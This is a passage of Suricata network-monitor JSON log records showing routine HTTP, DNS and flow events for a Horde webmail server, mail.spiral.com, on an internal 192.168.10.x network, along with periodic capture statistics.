x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:15:14.111009+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34838,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19292,"tx_id":1}} {"timestamp":"2020-02-29T00:15:17.000641+0000","flow_id":1917516803235951,"event_type":"flow","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:16.614511+0000","end":"2020-02-29T00:10:16.722829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:18.901872+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:15:18.902890+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34842,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} 
{"timestamp":"2020-02-29T00:15:19.000178+0000","event_type":"stats","stats":{"uptime":14571,"capture":{"kernel_packets":135935,"kernel_drops":0},"decoder":{"pkts":135937,"bytes":93547486,"invalid":188,"ipv4":134426,"ipv6":8,"ethernet":135937,"raw":0,"null":0,"sll":0,"tcp":129065,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099936},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2395,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":25125,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:22.000308+0000","flow_id":854757210952885,"event_type":"flow","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:21.758965+0000","end":"2020-02-29T00:10:21.866749+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000280+0000","flow_id":1577625976740859,"event_type":"flow","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.629755+0000","end":"2020-02-29T00:10:22.738168+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000607+0000","flow_id":1445628746846607,"event_type":"flow","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.840079+0000","end":"2020-02-29T00:10:22.948426+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.000695+0000","flow_id":1378485523115176,"event_type":"flow","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.978088+0000","end":"2020-02-29T00:10:23.086656+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:24.919104+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10440,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:25.153993+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994}} 
{"timestamp":"2020-02-29T00:15:26.000239+0000","event_type":"stats","stats":{"uptime":14578,"capture":{"kernel_packets":135939,"kernel_drops":0},"decoder":{"pkts":135941,"bytes":93547750,"invalid":188,"ipv4":134430,"ipv6":8,"ethernet":135941,"raw":0,"null":0,"sll":0,"tcp":129069,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2398,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":132277,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:27.000847+0000","flow_id":106655512661597,"event_type":"flow","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:26.069213+0000","end":"2020-02-29T00:10:26.177585+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:27.481543+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":45876,"tx_id":0}} {"timestamp":"2020-02-29T00:15:27.489535+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39614,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:27.654066+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273}} {"timestamp":"2020-02-29T00:15:29.000300+0000","flow_id":1297456683777400,"event_type":"flow","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":1153,"bytes_toclient":9222,"start":"2020-02-29T00:13:51.621944+0000","end":"2020-02-29T00:14:28.518250+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:32.654078+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":35273,"tx_id":1}} {"timestamp":"2020-02-29T00:15:33.000226+0000","event_type":"stats","stats":{"uptime":14585,"capture":{"kernel_packets":135960,"kernel_drops":0},"decoder":{"pkts":135974,"bytes":93568102,"invalid":188,"ipv4":134463,"ipv6":8,"ethernet":135974,"raw":0,"null":0,"sll":0,"tcp":129098,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2768,"new_pruned":15,"est_pruned":2400,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"
memcap":0}}} {"timestamp":"2020-02-29T00:15:35.000636+0000","flow_id":1080320319612926,"event_type":"flow","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":12,"bytes_toserver":1533,"bytes_toclient":9963,"start":"2020-02-29T00:14:28.518142+0000","end":"2020-02-29T00:14:34.691080+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:36.000855+0000","flow_id":1681976502983035,"event_type":"flow","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:35.072059+0000","end":"2020-02-29T00:10:35.180346+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:40.000158+0000","event_type":"stats","stats":{"uptime":14592,"capture":{"kernel_packets":135976,"kernel_drops":0},"decoder":{"pkts":135977,"bytes":93568300,"invalid":188,"ipv4":134466,"ipv6":8,"ethernet":135977,"raw":0,"null":0,"sll":0,"tcp":129101,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2769,"new_pruned":15,"est_pruned":2401,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23801,"memcap_state":0,"memcap_global":0},"http":{"memuse":46574,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:40.002310+0000","flow_id":54888288126643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:14:34.689843+0000","end":"2020-02-29T00:14:39.874407+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:41.000176+0000","flow_id":1207756279237984,"event_type":"flow","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.249184+0000","end":"2020-02-29T00:10:39.357577+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:41.000427+0000","flow_id":2107843985516552,"event_type":"flow","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.436232+0000","end":"2020-02-29T00:10:39.544428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.000587+0000","flow_id":2049496855059110,"event_type":"flow","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:43.170662+0000","end":"2020-02-29T00:10:43.278991+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:44.873520+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56447,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:44.982402+0000","flow_id":1508751902266416,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59127,"proto":"UDP","dns":{"type":"answer","id":56447,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:45.143410+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760}} 
{"timestamp":"2020-02-29T00:15:46.000610+0000","flow_id":1209336842897935,"event_type":"flow","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1089,"bytes_toclient":7728,"start":"2020-02-29T00:14:39.936463+0000","end":"2020-02-29T00:14:45.180132+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:47.000223+0000","event_type":"stats","stats":{"uptime":14599,"capture":{"kernel_packets":135984,"kernel_drops":0},"decoder":{"pkts":135995,"bytes":93577219,"invalid":188,"ipv4":134484,"ipv6":8,"ethernet":135995,"raw":0,"null":0,"sll":0,"tcp":129117,"udp":5164,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2789,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2805,"synack":2796,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1828,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2361,"failed_udp":112},"tx":{"http":4692,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2441}},"flow_mgr":{"closed_pruned":2770,"new_pruned":15,"est_pruned":2404,"bypas
sed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23141,"memcap_state":0,"memcap_global":0},"http":{"memuse":98271,"memcap":0}}} {"timestamp":"2020-02-29T00:15:49.000673+0000","flow_id":1084958869762291,"event_type":"flow","src_ip":"192.168.10.122","src_port":49707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:47.995571+0000","end":"2020-02-29T00:10:48.103585+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000287+0000","flow_id":1715253910491618,"event_type":"flow","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:48.905698+0000","end":"2020-02-29T00:10:49.013601+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.000649+0000","flow_id":1095949691237231,"event_type":"flow","src_ip":"192.168.10.122","src_port":46147,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.242543+0000","end":"2020-02-29T00:10:49.351235+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:50.000730+0000","flow_id":1940791233185635,"event_type":"flow","src_ip":"192.168.10.122","src_port":40899,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:49.100195+0000","end":"2020-02-29T00:10:49.208618+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:50.144599+0000","flow_id":413251773933581,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34844,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6760},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33149,"tx_id":0}} {"timestamp":"2020-02-29T00:15:50.221676+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24645,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
